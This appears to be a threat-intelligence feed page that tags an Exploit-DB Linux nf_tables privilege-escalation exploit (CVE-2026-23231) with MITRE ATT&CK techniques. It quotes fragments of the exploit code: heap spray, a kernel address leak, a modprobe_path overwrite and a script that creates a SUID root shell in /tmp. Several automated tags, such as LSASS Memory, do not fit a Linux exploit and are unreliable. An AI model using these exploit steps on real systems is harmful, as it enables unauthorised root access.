TTPwire Vol. 1 · MITRE ATT&CK Tagged


Exploit-DB

[local] Linux nf_tables 6.19.3 - Local Privilege Escalation

2 days ago

ATT&CK techniques detected

13 predictions
T1068 Exploitation for Privilege Escalation (98%)
“[ local ] linux nf _ tables 6. 19. 3 - local privilege escalation linux nf _ tables 6. 19. 3 - local privilege escalation * exploit title : linux kernel 3. 16 – 6. 19. 3 nf _ tables rcu uaf lpe * cve : cve - 2026 - 23231 * date : 2026 - 03 - 19 * exploit author : aviral srivastav…”
T1068 Exploitation for Privilege Escalation (92%)
“ctx * ctx ) { info ( " step 6 : attempting privilege escalation... " ) ; ( void ) ctx ; / * * modprobe _ path overwrite technique : * * when the kernel encounters an unknown binary format, it calls * call _ usermodehelper ( ) with the path from the global variable * modprobe _ pa…”
T1027.001 Binary Padding (87%)
“sizeof ( struct nlattr ) + slen ; struct nlattr * nla = nl _ alloc ( b, total ) ; nla - > nla _ len = ( uint16 _ t ) ( sizeof ( struct nlattr ) + slen ) ; nla - > nla _ type = type ; memcpy ( ( char * ) ( nla + 1 ), s, slen ) ; } static void nl _ put _ u32 ( struct nl _ builder *…”
T1068 Exploitation for Privilege Escalation (79%)
“chain ( ) in * the packet path — can access the freed nft _ base _ chain memory. the * freed object ( ~ 224 bytes ) resides in kmalloc - 256 and can be reclaimed * with user - controlled spray objects ( msg _ msg via msgsnd ). * * the exploit races a chain dump against the uaf tr…”
T1059.004 Unix Shell (73%)
“. " ) ; fprintf ( stderr, " \ n " ) ; / * execute the suid shell * / char * argv [ ] = { " / tmp / rootsh ", " - p ", null } ; execv ( " / tmp / rootsh ", argv ) ; / * fallback if rootsh doesn ' t exist * / info ( " execv failed — check / tmp / rootsh manually " ) ; } else { / * …”
T1068 Exploitation for Privilege Escalation (70%)
“##118cf1159443250647533 * adds synchronize _ rcu ( ) between nft _ chain _ del ( ) and chain destroy. * * compilation : * gcc - wall - wextra - o exploit exploit. c - lpthread - static * * usage : * $. / exploit * [ * ] cve - 2026 - 23231 — linux nf _ tables rcu uaf lpe * [ * ] t…”
T1068 Exploitation for Privilege Escalation (69%)
“##443250647533 * [ 3 ] cve - 2024 - 1086 — nf _ tables double - free lpe ( technique reference ) * [ 4 ] cve - 2023 - 32233 — nf _ tables anonymous set uaf ( msg _ msg spray reference ) * * disclaimer : * this exploit targets an already patched vulnerability. it is provided * for…”
T1059.004 Unix Shell (60%)
“a memory - constrained environment " ) ; step _ cleanup ( & ctx ) ; return 1 ; } / * step 4 : spray * / ret = step _ spray ( & ctx ) ; if ( ret < 0 ) { fail ( " spray failed " ) ; step _ cleanup ( & ctx ) ; return 1 ; } / * step 5 : info leak * / ret = step _ leak ( & ctx ) ; if …”
T1055.001 Dynamic-link Library Injection (48%)
“##────────────────────────────────────────────── * / struct race _ ctx { int nfnl _ fd ; / * nfnetlink socket for operations * / int dump _ fd ; / * nfnetlink socket for dump * / struct spray _ state spray ; volatile int uaf _ triggered ; volatile int dump _ started ; volatile in…”
T1068 Exploitation for Privilege Escalation (47%)
“kernel * address ( 0xffff8880... ), we ' ve hit the uaf * and are reading from sprayed msg _ msg data. * / uint64 _ t handle _ be = _ _ builtin _ bswap64 ( handle ) ; if ( ( handle _ be & 0xffff000000000000ull ) = = 0xffff000000000000ull ) { ctx - > leaked _ addr = handle _ be ; …”
T1574.013 KernelCallbackTable (44%)
“kernel * address ( 0xffff8880... ), we ' ve hit the uaf * and are reading from sprayed msg _ msg data. * / uint64 _ t handle _ be = _ _ builtin _ bswap64 ( handle ) ; if ( ( handle _ be & 0xffff000000000000ull ) = = 0xffff000000000000ull ) { ctx - > leaked _ addr = handle _ be ; …”
T1003.001 LSASS Memory (32%)
“##────── * / static int step _ setup ( struct race _ ctx * ctx ) { info ( " step 1 : creating user / net namespace... " ) ; if ( setup _ namespace ( ) < 0 ) return - 1 ; ok ( " namespace created, cap _ net _ admin obtained " ) ; / * open nfnetlink sockets * / ctx - > nfnl _ fd = …”
T1059.004 Unix Shell (31%)
“payload ( void ) { file * f ; / * create the helper script that will be called as root * / f = fopen ( " / tmp / pwn ", " w " ) ; if (! f ) return - 1 ; fprintf ( f, " #! / bin / sh \ n " ) ; fprintf ( f, " / bin / cp / bin / sh / tmp / rootsh \ n " ) ; fprintf ( f, " / bin / chm…”

Summary

Linux nf_tables 6.19.3 - Local Privilege Escalation